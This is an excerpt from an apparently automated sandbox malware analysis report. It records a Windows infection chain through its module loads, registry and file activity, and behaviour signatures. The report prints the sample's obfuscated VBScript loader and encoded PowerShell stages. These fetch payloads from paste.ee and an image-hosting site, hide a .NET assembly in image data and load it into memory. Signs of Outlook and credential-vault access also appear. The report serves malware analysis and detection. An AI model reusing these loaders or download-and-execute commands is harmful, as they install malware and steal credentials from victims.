Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: winsync.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: SyncHost.pdbGCTL source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2363857386.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3367182967.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: SyncHost.pdb source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") entreacto = ("$(@(?(@?@?dig@?@? = '") & golfar & "'" entreacto = entreacto & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" entreacto = entreacto & "[??}@*y??}@*" entreacto = entreacto & "t?*(?" entreacto = entreacto & "m.(@(?(@?@?" entreacto = entreacto & "nv?*(?r" entreacto = entreacto & "t]:" entreacto = entreacto & ":Fr@?@?" entreacto = entreacto & "mba??}@*" entreacto = entreacto & "?*(?64??}@*tring( $(@(?(" entreacto = entreacto & "@?@?d" entreacto = entreacto & "ig@?@?.r?*(?" entreacto = entreacto & "@%*:&la" entreacto = entreacto & "(@(?(?*(?('" entreacto = entreacto & "DgTr?*(?" entreacto = entreacto & "','" entreacto = entreacto & "A" entreacto = entreacto & "') ))" entreacto = entreacto & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" entreacto = Replace(entreacto,"@%*:&","p") entreacto = Replace(entreacto,"(@(?(","c") entreacto = Replace(entreacto,"?*(?","e") entreacto = Replace(entreacto,"@?@?","o") entreacto = Replace(entreacto,"??}@*","s") hypercinesia1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " hypercinesia1 = Replace(hypercinesia1,"(@(?(","c") hypercinesia1 = Replace(hypercinesia1,"??}@*","s") hypercinesia1 = Replace(hypercinesia1,"@?@?","o") hypercinesia1 = Replace(hypercinesia1,"@%*:&","p") hypercinesia = hypercinesia1 & """" & entreacto & """" Cama.Run hypercinesia, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/z0DWX", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false");IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/z0DWX", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false");IRegExp2.Pattern("[^0-9]");IRegExp2.Pattern("[^0-9,]");IWshShell3.ExpandEnvironmentStrings("%LocalAppData%");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\DesktopPic\");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\DesktopPic\");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/z0DWX", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false");IRegExp2.Pattern("[^0-9]");IRegExp2.Pattern("
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByD
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTre